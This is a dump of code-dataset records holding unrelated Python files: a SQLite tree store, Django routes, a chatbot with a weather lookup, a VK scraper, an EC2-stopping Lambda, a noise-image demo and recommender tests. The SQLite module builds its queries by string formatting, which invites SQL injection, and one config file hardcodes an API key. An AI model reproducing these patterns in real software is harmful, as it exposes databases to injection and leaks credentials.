cursor.execute(\"\"\"\n create table if not exists {table_name} (\n ID INTEGER PRIMARY KEY AUTOINCREMENT, \n PARENT_ID INTEGER NOT NULL ,\n NAME CHAR(100) NOT NULL, \n THIS_LIST boolean NOT NULL\n );\"\"\".format(table_name=MAIN_TABLE_NAME))\n\n\n@database_cursor\ndef add_element(cursor: sqlite3.Cursor, name: str, this_list: bool, parent_id=0) -> Tuple[int, str]:\n if not is_valid_name(name):\n return 0, \"Invalid name\"\n\n res = cursor.execute(\"SELECT COUNT(*) FROM {table_name} WHERE PARENT_ID = {parent_id} AND NAME = '{name}';\".format(\n table_name=MAIN_TABLE_NAME,\n name=name,\n parent_id=parent_id,\n )).fetchone()[0]\n if res:\n return 0, \"This name already use\"\n\n query = \"\"\"\n INSERT INTO {table_name} (PARENT_ID, NAME, THIS_LIST) \n VALUES ({parent_id}, '{name}', {THIS_LIST});\n \"\"\".format(\n table_name=MAIN_TABLE_NAME,\n name=name,\n THIS_LIST=int(this_list),\n parent_id=parent_id,\n )\n if not parent_id:\n cursor.execute(query)\n return 1, ''\n\n parent_element = read_element(cursor, parent_id)\n if not parent_element:\n return 0, \"Invalid key 'parent_id'\"\n\n if not parent_element[1]:\n return 0, \"Parent is not list\"\n\n cursor.execute(query)\n return 1, ''\n\n\ndef read_element(cursor: sqlite3.Cursor, element_id: int):\n return cursor.execute(\"\"\"\n SELECT NAME, THIS_LIST, PARENT_ID FROM {table_name}\n WHERE ID == {element_id};\n \"\"\".format(\n table_name=MAIN_TABLE_NAME,\n element_id=element_id,\n )).fetchone()\n\n\n@database_cursor\ndef read_table(cursor: sqlite3.Cursor, parent_id=0):\n parent_el = read_element(cursor, parent_id)\n if parent_el is None and parent_id != 0:\n return 0, \"Invalid parent_id\"\n data = cursor.execute(\"\"\"\n SELECT ID, NAME, THIS_LIST \n FROM {table_name} where PARENT_ID={parent_id}\n ORDER BY THIS_LIST DESC, name ASC;\n \"\"\".format(\n table_name=MAIN_TABLE_NAME,\n parent_id=parent_id,\n )).fetchall()\n return {\n 'items': [[id_, name, bool(this_list)] for id_, name, this_list in data],\n 'count': len(data),\n }\n\n\ndef is_list_element(cursor: sqlite3.Cursor, element_id: int) -> bool:\n element = read_element(cursor, element_id)\n return element is None or bool(element[1]) or element_id == 0\n\n\n@database_cursor\ndef update_element(cursor: sqlite3.Cursor, element_id: int, name: str, parent_id: int):\n element = read_element(cursor, element_id)\n if not element:\n return 0, \"Invalid element_id\"\n element_name, this_list, element_parent_id = element\n if name is not None and is_valid_name(name):\n element_name = name\n if parent_id is not None:\n if not is_list_element(cursor, parent_id) or parent_id == element_id or (this_list and str(parent_id) in get_lists_in_list(cursor, element_id)):\n return 0, \"Invalid parent_id\"\n element_parent_id = parent_id\n cursor.execute(\"\"\"\n UPDATE {table_name}\n SET NAME = '{new_name}', PARENT_ID = {new_parent_id}\n WHERE ID = {element_id}\n ;\"\"\".format(\n table_name=MAIN_TABLE_NAME,\n new_name=element_name,\n new_parent_id=element_parent_id,\n element_id=element_id,\n ))\n return 1, None\n\n\ndef get_lists_in_list(cursor: sqlite3.Cursor, element_id) -> list:\n parent_ids = [str(element_id)]\n for parent_id in parent_ids:\n res = cursor.execute(\"\"\"\n SELECT ID FROM {table_name}\n WHERE THIS_LIST == 1 AND PARENT_ID = {parent_id}\n ;\"\"\".format(\n table_name=MAIN_TABLE_NAME,\n parent_id=parent_id,\n )).fetchall()\n if not res:\n break\n parent_ids += [str(a[0]) for a in res]\n return parent_ids\n\n\n@database_cursor\ndef delete_element(cursor: sqlite3.Cursor, element_id: int):\n element = read_element(cursor, element_id)\n if not element:\n return 0, \"Invalid element_id\"\n if not element[1]:\n cursor.execute(\"\"\"\n DELETE FROM {table_name}\n WHERE ID = {element_id}\n ;\"\"\".format(\n table_name=MAIN_TABLE_NAME,\n element_id=element_id,\n ))\n return 1, None\n delete_parents_ids = get_lists_in_list(cursor, element_id)\n\n cursor.execute(\"\"\"\n DELETE FROM {table_name}\n WHERE PARENT_ID IN {delete_ids} OR ID = {element_id}\n ;\"\"\".format(\n table_name=MAIN_TABLE_NAME,\n delete_ids=\"({})\".format(','.join(delete_parents_ids)),\n element_id=element_id,\n ))\n return 1, None\n","sub_path":"classis/utils_db.py","file_name":"utils_db.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"437631403","text":"from django.conf.urls import url\n\n\nfrom .views import assign, lobby, exit_survey, done, instruction\n\nurlpatterns = [\n url(r'^$', assign),\n url(r'^lobby/$', lobby, name='lobby'),\n url(r'^exit/$', exit_survey, name='exit'),\n url(r'^done/$', done, name='done'),\n url(r'^instruction/$', instruction, name='instruction'),\n]\n","sub_path":"game/interactive_static/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"487166421","text":"import requests as rq\r\n\r\n\r\nversion = \"1.5.0\"\r\ncidade = 'joinville'\r\n\r\ndef intro():\r\n\tmsg = \"Assistente - version {} / by: Fulano beltrano ciclano\".format(version)\r\n\tprint(\"-\" * len(msg) + \"\\n{}\\n\".format(msg) + \"-\" * len(msg))\r\n\r\n\r\nlista_erros = [\r\n\t\t\"Não entendi nada\",\r\n\t\t\"Desculpe, não entendi\",\r\n\t\t\"Repita novamente por favor\"\r\n]\r\n\r\nconversas = {\r\n\t\"Olá\": \"oi, tudo bem?\",\r\n\t\"sim e você\": \"Estou bem obrigada por perguntar\",\r\n}\r\n\r\ncomandos = {\r\n\t\"desligar\": \"desligando\",\r\n\t\"reiniciar\": \"reiniciando\"\r\n}\r\n\r\n\r\ndef verifica_nome(user_name):\r\n\tif user_name.startswith(\"Meu nome é\"):\r\n\t\tuser_name = user_name.replace(\"Meu nome é\", \"\")\r\n\tif user_name.startswith(\"Eu me chamo\"):\r\n\t\tuser_name = user_name.replace(\"Eu me chamo\", \"\")\r\n\tif user_name.startswith(\"Eu sou o\"):\r\n\t\tuser_name = user_name.replace(\"Eu sou o\", \"\")\r\n\tif user_name.startswith(\"Eu sou a\"):\r\n\t\tuser_name = user_name.replace(\"Eu sou a\", \"\")\r\n\r\n\treturn user_name \r\n\r\n\r\ndef verifica_nome_exist(nome):\r\n\tdados = open(\"dados/nomes.txt\", \"r\")\r\n\tnome_list = dados.readlines()\r\n\r\n\tif not nome_list:\r\n\t\tvazio = open(\"dados/nomes.txt\", \"r\")\r\n\t\tconteudo = vazio.readlines()\r\n\t\tconteudo.append(\"{}\".format(nome))\r\n\t\tvazio = open(\"dados/nomes.txt\", \"w\")\r\n\t\tvazio.writelines(conteudo)\r\n\t\tvazio.close()\r\n\r\n\t\treturn \"Olá {}, prazer em te conhecer!\".format(nome)\r\n\r\n\tfor linha in nome_list:\r\n\t\tif linha == nome:\r\n\t\t\treturn \"Olá {}, acho que já nos conhecemos\".format(nome)\r\n\r\n\tvazio = open(\"dados/nomes.txt\", \"r\")\r\n\tconteudo = vazio.readlines()\r\n\tconteudo.append(\"\\n{}\".format(nome))\r\n\tvazio = open(\"dados/nomes.txt\", \"w\")\r\n\tvazio.writelines(conteudo)\r\n\tvazio.close()\r\n\r\n\treturn \"Oi {} é a primeira vez que nos falamos\".format(nome)\r\n\r\n\r\ndef name_list():\r\n\ttry:\r\n\t\tnomes = open(\"dados/nomes.txt\", \"r\")\r\n\t\tnomes.close()\r\n\r\n\texcept FileNotFoundError:\r\n\t\tnomes = open(\"dados/nomes.txt\", \"w\")\r\n\t\tnomes.close()\r\n\r\n\r\ndef calcula(entrada):\r\n\tif \"mais\" in entrada or \"+\" in entrada:\r\n\t\t# É soma\r\n\t\tentradas_recebidas = entrada.split(\" \")\r\n\t\tresultado = int(entradas_recebidas[1]) + int(entradas_recebidas[3])\r\n\r\n\telif \"menos\" in entrada or \"-\" in entrada:\r\n\t\t# É subtração\r\n\r\n\t\tentradas_recebidas = entrada.split(\" \")\r\n\t\tresultado = int(entradas_recebidas[1]) - int(entradas_recebidas[3])\r\n\r\n\telif \"vezes\" in entrada or \"x\" in entrada:\r\n\t\t# É vezes\r\n\r\n\t\tentradas_recebidas = entrada.split(\" \")\r\n\t\tresultado = round(float(entradas_recebidas[1]) * float(entradas_recebidas[3]), 2)\r\n\r\n\telif \"dividido\" in entrada or \"/\" in entrada:\r\n\t\t# É divisão\r\n\r\n\t\tentradas_recebidas = entrada.split(\" \")\r\n\t\tresultado = round(float(entradas_recebidas[1]) / float(entradas_recebidas[4]), 2)\r\n\r\n\telse:\r\n\r\n\t\tresultado = \"Operação não encontrada\"\r\n\r\n\r\n\treturn resultado\r\n\r\n\r\n\r\ndef clima_tempo():\t\r\n\tendereco_api = \"http://api.openweathermap.org/data/2.5/weather?appid=9e1280f88eef9db700e867bb898fd3ec&q=\"\r\n\turl = endereco_api + cidade\r\n\r\n\tinfos = rq.get(url).json()\r\n\r\n\r\n\t# Coord\r\n\tlongitude = infos['coord']['lon']\r\n\tlatitude = infos['coord']['lat']\r\n\t# main\r\n\ttemp = infos['main']['temp'] - 273.15 # Kelvin para Celsius\r\n\tpressao_atm = infos['main']['pressure'] / 1013.25 #Libras para ATM\r\n\thumidade = infos['main']['humidity'] # Recebe em porcentagem\r\n\ttemp_max= infos['main']['temp_max'] - 273.15 # Kelvin para Celsius\r\n\ttemp_min = infos['main']['temp_min'] - 273.15 # Kelvin para Celsius\r\n\r\n\t#vento\r\n\tv_speed = infos['wind']['speed'] # km/ h\r\n\tv_direc = infos['wind']['deg'] #Recebe em graus\r\n\r\n\t#clouds / nuvens\r\n\r\n\tnebulosidade = infos['clouds']['all']\r\n\r\n\t#id\r\n\tid_da_cidade = infos['id']\r\n\r\n\t# 11\r\n\treturn [longitude, latitude, \r\n\t\ttemp, pressao_atm, humidade, \r\n\t\ttemp_max, temp_min, v_speed, \r\n\t\tv_direc, nebulosidade, id_da_cidade]\r\n\r\n\r\ndef temperatura():\r\n\ttemp_atual = clima_tempo()[2]\r\n\ttemp_max = clima_tempo()[5]\r\n\ttemp_min = clima_tempo()[6]\r\n\t\r\n\treturn [temp_atual, temp_max, temp_min]","sub_path":"006 - Código vídeo 6/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444360617","text":"import urllib.request as ur\r\nimport os\r\nimport shutil\r\nimport json\r\nimport math\r\nfrom datetime import date\r\nimport my_plt\r\n\r\n\r\n\r\ndef get_wall(dictPost2Comment, dictAge, dictCity, owner_id, count, offset):\r\n rowPost = 'https://api.vk.com/method/wall.get?owner_id=%s&count=%s&offset=%s'\r\n req = rowPost % (str(owner_id), str(count), offset) \r\n responseWall = ur.urlopen(ur.Request(req))\r\n wall_js = json.loads(responseWall.read().decode('utf-8'))\r\n\r\n for post in wall_js['response'][1:]:\r\n post_text = post['text'].replace('
',' ')\r\n post_text = post_text.replace(' ',' ')\r\n post_length = len(post_text.split(' '))\r\n \r\n post_id = post['id']\r\n user_id = post['from_id'] \r\n age, city = user_info(user_id)\r\n dictAge.update(collect_dict_age(dictAge, age, 'post_length', post_length))\r\n dictCity.update(collect_dict_city(dictCity, city, 'post_length', post_length))\r\n\r\n # если в посте есть текст, записываем его в файл post-id_user-id.txt \r\n if len(post_text) != 0:\r\n f = open('posts/'+str(post_id)+'_'+ str(user_id) + '.txt', 'w', encoding = 'utf-8')\r\n f.write(post_text)\r\n f.close()\r\n \r\n n_comm = post['comments']['count'] \r\n \r\n for i in range (math.floor(n_comm/100)+1):\r\n offset = 100*i\r\n if n_comm>100:\r\n count = 100\r\n n_comm-=100\r\n else:\r\n count = n_comm\r\n dictAge, dictCity, average_comm_len = get_post_comments(post_id, owner_id, count, dictAge, dictCity)\r\n \r\n \r\n try:\r\n k = dictPost2Comment[post_length]\r\n dictPost2Comment.update({post_length: (k+average_comm_len)/2})\r\n \r\n except KeyError:\r\n dictPost2Comment[post_length]= average_comm_len\r\n\r\n return dictPost2Comment, dictAge, dictCity\r\n\r\n \r\n\r\n \r\ndef get_post_comments(post_id, owner_id, count, dictAge, dictCity):\r\n rowComments = 'https://api.vk.com/method/wall.getComments?post_id=%s&owner_id=%s&count=%s&offset=%s'\r\n reqComments = rowComments % (str(post_id), str(owner_id), str(count), 0 )\r\n responsePost = ur.urlopen(ur.Request(reqComments))\r\n comm_js = json.loads(responsePost.read().decode('utf-8'))\r\n\r\n comment_lengths = []\r\n for comment in comm_js['response'][1:]:\r\n comm_text = comment['text'].replace('
',' ')\r\n comm_text = comm_text.replace(' ',' ')\r\n comm_length = len(comm_text.split(' '))\r\n \r\n comm_id = comment['cid'] \r\n user_id = comment['uid']\r\n age, city = user_info(user_id)\r\n \r\n dictAge.update(collect_dict_age(dictAge, age, 'comment_lengths', comm_length))\r\n dictCity.update(collect_dict_city(dictCity, city, 'comment_lengths', comm_length))\r\n comment_lengths.append(comm_length)\r\n \r\n if len(comm_text)!=0:\r\n f = open('comments/'+str(post_id)+'_'+ str(comm_id) +'_'+str(user_id)+'.txt', 'w', encoding = 'utf-8')\r\n f.write(comm_text)\r\n f.close()\r\n \r\n \r\n if len(comment_lengths)!=0:\r\n average_comm_len = sum(comment_lengths)/len(comment_lengths)\r\n else: average_comm_len = 0\r\n \r\n return dictAge, dictCity, average_comm_len\r\n \r\ndef user_info(user_id):\r\n responseAccount = ur.urlopen(ur.Request('https://api.vk.com/method/users.get?user_ids='+str(user_id)+'&fields=sex,bdate,city,home_town'))\r\n user_info_js = json.loads(responseAccount.read().decode('utf-8'))\r\n \r\n #для записей от имени сообщества\r\n if user_id < 0:\r\n city, age = 0, 0\r\n \r\n else:\r\n try: \r\n city = user_info_js['response'][0]['city']\r\n except KeyError:\r\n city = 0\r\n try: \r\n bdate = user_info_js['response'][0]['bdate'].split('.')\r\n if len(bdate) == 3: #год рождения указан\r\n bdate = date(int(bdate[2]), int(bdate[1]), int(bdate[1])) # year, month, day \r\n today = date.today()\r\n age = today.year - bdate.year - ((today.month, today.day)<(bdate.month, bdate.day))\r\n else:\r\n age = 0 \r\n except KeyError:\r\n age = 0 \r\n return age, city \r\n \r\n \r\n\r\ndef collect_dict_age(dictAge, age, x_length, x_value):\r\n if age!=0:\r\n try:\r\n dictAge[age][x_length].append(x_value)\r\n except KeyError:\r\n try:\r\n dictAge[age].update({x_length : [x_value]})\r\n except KeyError:\r\n dictAge[age]= {x_length : [x_value]}\r\n \r\n return dictAge\r\n\r\n\r\n\r\ndef collect_dict_city(dictCity, city, x_length, x_value):\r\n if city!=0:\r\n try:\r\n dictCity[city][x_length].append(x_value)\r\n except KeyError:\r\n try:\r\n dictCity[city].update({x_length : [x_value]})\r\n except KeyError:\r\n dictCity[city]= {x_length : [x_value]}\r\n\r\n return dictCity\r\n\r\n\r\n\r\ndef main():\r\n #owner_id = -60854067\r\n owner_id = -33374477\r\n n = 115\r\n \r\n dictPost2Comment= {}\r\n dictAge= {}\r\n dictCity = {}\r\n \r\n # папки post и comments\r\n for fold in ['posts', 'comments']:\r\n if fold in os.listdir():\r\n shutil.rmtree(fold)\r\n os.mkdir(fold)\r\n\r\n for i in range (math.floor(n/100)+1):\r\n offset = 100*i\r\n if n>100:\r\n count = 100\r\n n-=100\r\n else:\r\n count = n\r\n get_wall(dictPost2Comment, dictAge, dictCity, owner_id, count, offset)\r\n \r\n\r\n my_plt.Post2Comment_graph(dictPost2Comment) \r\n my_plt.Age_graph(dictAge)\r\n my_plt.City2Comment_graph(dictCity)\r\n my_plt.City2Post_graph(dictCity)\r\n\r\nmain()\r\n","sub_path":"vk-matplotlib/vk_post-comments.py","file_name":"vk_post-comments.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"71036820","text":"__author__ = 'Matt L'\n\nimport RPi.GPIO as gpio\nimport time\nimport sys\n\nclass CarDistance:\n\n def __init__(self):\n gpio.setwarnings(False)\n gpio.setmode(gpio.BOARD)\n gpio.setup(12, gpio.OUT)\n gpio.setup(16, gpio.IN)\n self.nosig = None\n self.sig = None\n self.sigtime = None\n\n def objdistance(self):\n\n gpio.output(12, False)\n\n while gpio.input(16) == 0:\n self.nosig = time.time()\n\n while gpio.input(16) == 1:\n self.sig = time.time()\n\n self.sigtime = self.sig - self.nosig\n self.distance = self.sigtime/0.000058\n\n return int(self.distance)\n\nif __name__ == '__main__':\n CartDistance = CarDistance()\n print(CartDistance.objdistance())\n gpio.cleanup()\n","sub_path":"DistanceSensor.py","file_name":"DistanceSensor.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"373630106","text":"def parse_entry(entry):\n space_split = entry.split(' ')\n start = space_split[2].strip(':').split(',')\n size = space_split[3].split('x')\n return {'id': space_split[0],\n 'x': int(start[0]),\n 'y': int(start[1]),\n 'length': int(size[0]),\n 'width': int(size[1])}\n\ndef update_sets(entry, point_set, intersection_set, no_conflict):\n new_set = set()\n for i in range(entry['length']):\n for j in range(entry['width']):\n new_set.add((entry['x'] + i, entry['y'] + j))\n intersection = point_set.intersection(new_set)\n if len(intersection) == 0:\n no_conflict.append(entry['id'])\n point_set = point_set.union(new_set)\n intersection_set = intersection_set.union(intersection)\n return (point_set, intersection_set, no_conflict)\n\ndef verify_no_conflict(entry, intersection_set):\n for i in range(entry['length']):\n for j in range(entry['width']):\n if (entry['x'] + i, entry['y'] + j) in intersection_set:\n return False\n return True\n\nwith open('../../input') as _file:\n _input = _file.read()\n entries = _input.split('\\n')\n\npoint_set = set()\nintersection_set = set()\nno_conflict = list()\n\nfor entry in entries:\n if entry == '' or entry is None:\n continue\n parsed_entry = parse_entry(entry)\n point_set, intersection_set, no_conflict = update_sets(parsed_entry, point_set, intersection_set, no_conflict)\n\n\nfor id_str in no_conflict:\n idx = int(id_str[1:]) - 1\n parsed_entry = parse_entry(entries[idx])\n if verify_no_conflict(parsed_entry, intersection_set):\n print(parsed_entry)\n# print(no_conflict)\n","sub_path":"day03/part2/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"416636130","text":"#!/usr/bin/env python3\n#\n# Script to extract version information from library.json and print preprocessor\n# flags for PlatformIO to inject them into the code.\n#\n# SPDX-FileCopyrightText: 2021 Junde Yhi \n# SPDX-License-Identifier: MIT\n\nimport json\n\nwith open(\"library.json\", \"r\") as library_json:\n library = json.load(library_json)\n\nhttp_simple_ver = library[\"version\"]\nfor dep in library[\"dependencies\"]:\n if dep[\"name\"] == \"tinywot\":\n tinywot_ver = dep[\"version\"]\n else:\n tinywot_ver = \"0\" # XXX\n\nprint(\"-D TINYWOT_HTTP_SIMPLE_VERSION='\\\"{}\\\"' -D TINYWOT_VERSION='\\\"{}\\\"'\"\n .format(http_simple_ver, tinywot_ver))\n","sub_path":"script/version-build-flags.py","file_name":"version-build-flags.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"70054705","text":"import boto3\n\nregions = ['us-east-1','us-east-2','us-west-1','us-west-2']\n\ndef lambda_handler(event, context):\n for region in regions : \n print(\"Region->\",region)\n ec2 = boto3.client('ec2', region_name=region)\n instances = getInstance( ec2 )\n if instances:\n stop(ec2, instances)\n else :\n print(\"Not instances in this region \")\n\ndef start(ec2, instances):\n ec2.start_instances(InstanceIds=instances)\n print('started your instances: ' + str(instances))\n\ndef stop (ec2, instances):\n ec2.stop_instances(InstanceIds=instances)\n print('stopped your instances: ' + str(instances))\n\ndef getInstance(ec2):\n instances = []\n \n response = ec2.describe_instances(\n Filters=[\n {\n 'Name': 'tag:estatus',\n 'Values': [\n 'test', 'QA','qa','dev','desarrollo'\n ],\n },\n ]\n \n )\n \n for res in response[\"Reservations\"]:\n for li in res[\"Instances\"]:\n instances.append(li[\"InstanceId\"])\n \n return instances\n","sub_path":"EC2/Start-StopEC2/Off-ec2-function-week.py","file_name":"Off-ec2-function-week.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"654147146","text":"import numpy as np\nfrom scipy.fft import fftn, ifftn, fftshift, fftfreq\nimport streamlit as st\nimport matplotlib.pyplot as plt\nimport subprocess\n\nimage_seed = st.sidebar.slider('Image Seed', 0, 10000, 0)\ntransform_seed = st.sidebar.slider('Transform Seed', 0, 10000, 0)\ntransform_level = st.sidebar.slider('Transform Level', 0.0, 100.0, 0.0)\n\n\ndef random_channel(n, rand, fpower=2.0):\n freq = fftn(rand.rand(n, n))\n\n fx = fftfreq(n)[:, None]\n fy = fftfreq(n)[None, :]\n\n # combine as l2 norm of freq\n f = (fx**2 + fy**2)**0.5\n\n i = f > 0\n freq[i] /= f[i]**fpower\n freq[0, 0] = 0.0\n\n data = np.real(ifftn(freq))\n data -= data.min()\n data /= data.max()\n return data\n\n@st.cache\ndef random_gray(n, seed, fpower=2.0):\n rand = np.random.RandomState(seed)\n return random_channel(n, rand, fpower)\n\n@st.cache\ndef random_color(n, seed):\n rand = np.random.RandomState(seed)\n return np.stack([random_channel(n, rand) for _ in range(3)], 2)\n\n\ndef rotate_image(img, i, j, a):\n c = np.cos(a)\n s = np.sin(a)\n\n img = 2.0*img-1.0\n x, y = img[:, :, i], img[:, :, j]\n img[:, :, i], img[:, :, j] = c * x + s * y, -s * x + c * y\n img -= img.min()\n img /= img.max()\n return img\n\nn = 512\nimg = random_color(n, image_seed)\n\na = random_color(n, transform_seed) * transform_level\nimg = rotate_image(img, 0, 1, a[:, :, 0])\nimg = rotate_image(img, 0, 2, a[:, :, 1])\nimg = rotate_image(img, 1, 2, a[:, :, 2])\n\n'''\n# Output\n\nPlay around with the parameters on the left to change the image.\n'''\n\nst.image(img, width=600)\n\n'''\nThe image is generated as follows:\n\n1. Generate 6D cube of \"brownian noise\". We'll name these coordinates (R, G, B, A1, A2, A3).\n2. Apply a rotation of angle A1*Level to (R, G) plane.\n3. Apply a rotation of angle A2*Level to (R, B) plane.\n4. Apply a rotation of angle A3*Level to (G, B) plane.\n5. The resulting (R, G, B) data is the image.\n\n# Background\n\nI was inspired to write this after seeing some neat examples from the [accidental noise library](http://accidentalnoise.sourceforge.net).\n\nMy approach to doing this was:\n\n1. Generate nice looking 2D noise. I found that a 2D analog of [brownian noise](https://en.wikipedia.org/wiki/Colors_of_noise#Brownian_noise) looked pretty good.\n2. Stack 6 independent channels to form the 6D cube.\n3. Apply the rotations outlined above.\n\nOut of these steps, I found the most interesting bit to be generating the 2D noise.\n\nThere seem to be many approaches for doing this, including classic approaches like [Perlin](https://en.wikipedia.org/wiki/Perlin_noise) and [Simplex](https://en.wikipedia.org/wiki/Simplex_noise) noise. Since I had access to good numeric libraries, I ended up going straight to the following FFT based approach.\n\nFirst, we generate a 2D image of uniformly sampled random noise. It pretty much looks like the static on your TV a.k.a. white noise.\n'''\n\nst.image(random_gray(512, 32, 0.0))\n\n'''\nWhite noise looks pretty harsh, so we want to smooth it out to get brownian noise.\n\nTo do this, we take the 2D FFT to get to the frequency domain and then rescale things so they fall off like 1/f^2. To be nitpicky, I only found a general definition of brownian noise in 1D. Still... we're doing something very similar by rescaling by \"one over the Euclidean norm squared\".\n\nFinally, we take the inverse 2D FFT to get our image back.\n'''\n\nst.image(random_gray(512, 32))\n\n'''\nNoice!\n'''\n\nif st.sidebar.button('Save Video'):\n for i, level in enumerate(np.linspace(0, 100.0, 300)):\n img = random_color(n, image_seed)\n a = random_color(n, transform_seed) * level\n img = rotate_image(img, 0, 1, a[:, :, 0])\n img = rotate_image(img, 0, 2, a[:, :, 1])\n img = rotate_image(img, 1, 2, a[:, :, 2])\n plt.imsave(f'frames/{i:03d}.jpg', img)\n\n filename = f'videos/{image_seed}-{transform_seed}.mp4'\n subprocess.check_call(['ffmpeg', '-y', '-framerate', '10', '-i', 'frames/%03d.jpg', filename])\n\nst.sidebar.text('(Requires ffmpeg)')","sub_path":"docs/static/noice.py","file_name":"noice.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"205019587","text":"import time\nimport random\nfrom multiprocessing import Process,Semaphore\ndef ktv(person,sem):\n sem.acquire()\n print(\"%s进入了ktv,正在唱歌\"%(person))\n time.sleep(2)\n print(\"%s唱完了,离开了ktv\"%(person))\n sem.release()\n\nif __name__ == \"__main__\":\n sem = Semaphore(3)\n for i in range(10):\n p = Process(target=ktv,args=(\"person%s\"%(i),sem))\n p.start()","sub_path":"web scrapy/exercise/multiprocessing/08_信号量_3.py","file_name":"08_信号量_3.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"212066743","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\nimport nmf\n\ndef test1(): \n \"\"\" trouver minimum de nb itérations nécessaire \"\"\"\n # plotter erreur sur données de test et d'apprentissage\n ratings = np.genfromtxt('data/data1/ratings.csv', delimiter=\",\", dtype=(int,int,float,int))\n ratings = ratings[1:]\n data_train,data_test = nmf.split_data(ratings)\n nb_users = 671\n nb_movies = 164979\n z = 3\n eps = 5e-3 #10e-3,5e-3\n epsu = 10e-5\n epsi = 10e-5\n nb_iter = 10000 # nb_iter = 20 000 est suffisant selon le graphe \n nb_norm = 100\n error_threshold = 1\n Nu,Ni = nmf.init_matrix(nb_users,nb_movies,z,5,0)\n iter_histo,train_error_histo,test_error_histo,Nu,Ni = nmf.SGD_error_included(data_train,data_test,Nu,Ni,nb_iter,nb_norm,eps,epsu,epsi,error_threshold)\n plt.figure()\n plt.plot(iter_histo,test_error_histo)\n plt.show()\n# Nu_embedded = TSNE(n_components=2).fit_transform(Nu)\n# plt.figure()\n# plt.plot(Nu_embedded[:,0],Nu_embedded[:,1], 'b*')\n \ndef test2():\n \"\"\" trouver la meilleure couple de eps et eps_ui \"\"\"\n ratings = np.genfromtxt('data/data1/ratings.csv', delimiter=\",\", dtype=(int,int,float,int))\n ratings = ratings[1:]\n data_train,data_test = nmf.split_data(ratings)\n nb_users = 671\n nb_movies = 164979\n z = 3\n Nu,Ni = nmf.init_matrix(nb_users,nb_movies,z,5,0)\n lb = 1e-5\n up = 1e-1\n nb_eps = 2\n eps,eps_ui,error_train,error_test = nmf.optim_eps(data_train,data_test,Nu,Ni,lb,up,nb_eps)\n np.save(\"result/data1/eps.npy\",eps)\n np.save(\"result/data1/error_train.npy\",error_train)\n np.save(\"result/data1/error_test\",error_test)\n error_min = error_test.min()\n print(\"erreur minimale = \", error_min)\n f = plt.figure()\n plt.imshow(error_test,extent=[lb,up,lb,up])\n plt.colorbar()\n plt.title(\"error_test selon eps\")\n plt.xlabel(\"epsilon de SGD\")\n plt.ylabel(\"epsilon utilisateur idem\")\n f.savefig(\"result/data1/erreur_eps.pdf\")\n\n\n\"\"\" nouvelle données avec plus d'information sur les utilisateurs\"\"\"\n\"\"\" UserIDs range between 1 and 6040; MovieIDs range between 1 and 3952 \"\"\"\ndef test3():\n \"\"\" trouver minimum de nb itérations nécessaire \"\"\"\n \"\"\" 300 000 iter \"\"\"\n ratings = np.load('data/data2/ratings.npy') \n data_train,data_test = nmf.split_data(ratings)\n nb_users = 6040\n nb_movies = 3883\n z = 3\n eps = 5e-3\n epsu = 10e-5\n epsi = 10e-5\n nb_iter = 300000\n nb_norm = 200\n error_threshold = 1\n Nu,Ni = nmf.init_matrix(nb_users,nb_movies,z,5,0)\n iter_histo,train_error_histo,test_error_histo,Nu,Ni = nmf.SGD_error_included(data_train,data_test,Nu,Ni,nb_iter,nb_norm,eps,epsu,epsi,error_threshold)\n np.save(\"result/data2/iter_histo.npy\",iter_histo)\n np.save(\"result/data2/test_error_histo.npy\",test_error_histo)\n np.save(\"result/data2/train_error_histo.npy\",train_error_histo)\n f, (ax1, ax2) = plt.subplots(2, sharex=True)\n ax1.plot(iter_histo,train_error_histo)\n ax1.set_title('train')\n ax1.set_ylabel('poucentage mal prédit')\n ax2.plot(iter_histo,test_error_histo)\n ax2.set_title('test')\n ax2.set_xlabel('nb iteration')\n f.savefig(\"result/data2/error_percent.pdf\")\n\ndef test4():\n \"\"\" trouver meilleure eps \"\"\"\n ratings = np.load('data/data2/ratings.npy')\n data_train,data_test = nmf.split_data(ratings)\n nb_users = 6040\n nb_movies = 3883\n z = 3 \n Nu,Ni = nmf.init_matrix(nb_users,nb_movies,z,5,0)\n lb = 1e-5\n up = 1e-1\n nb_eps = 50\n nb_iter = 300000\n eps,eps_ui,error_train,error_test = nmf.optim_eps(data_train,data_test,Nu,Ni,lb,up,nb_eps,nb_iter = nb_iter)\n np.save(\"result/data2/eps.npy\",eps)\n np.save(\"result/data2/error_train.npy\",error_train)\n np.save(\"result/data2/error_test.npy\",error_test)\n error_min = error_test.min()\n print(\"erreur minimale = \", error_min)\n plt.figure()\n plt.imshow(error_test,extent=[lb,up,lb,up])\n plt.colorbar()\n plt.title(\"error_test selon eps\")\n plt.xlabel(\"epsilon de SGD\")\n plt.ylabel(\"epsilon utilisateur idem\")\n plt.savefig(\"result/data2/error_eps.pdf\")\n\nerror = np.load(\"\")","sub_path":"Recommendation-System/nmf_projet_test.py","file_name":"nmf_projet_test.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} 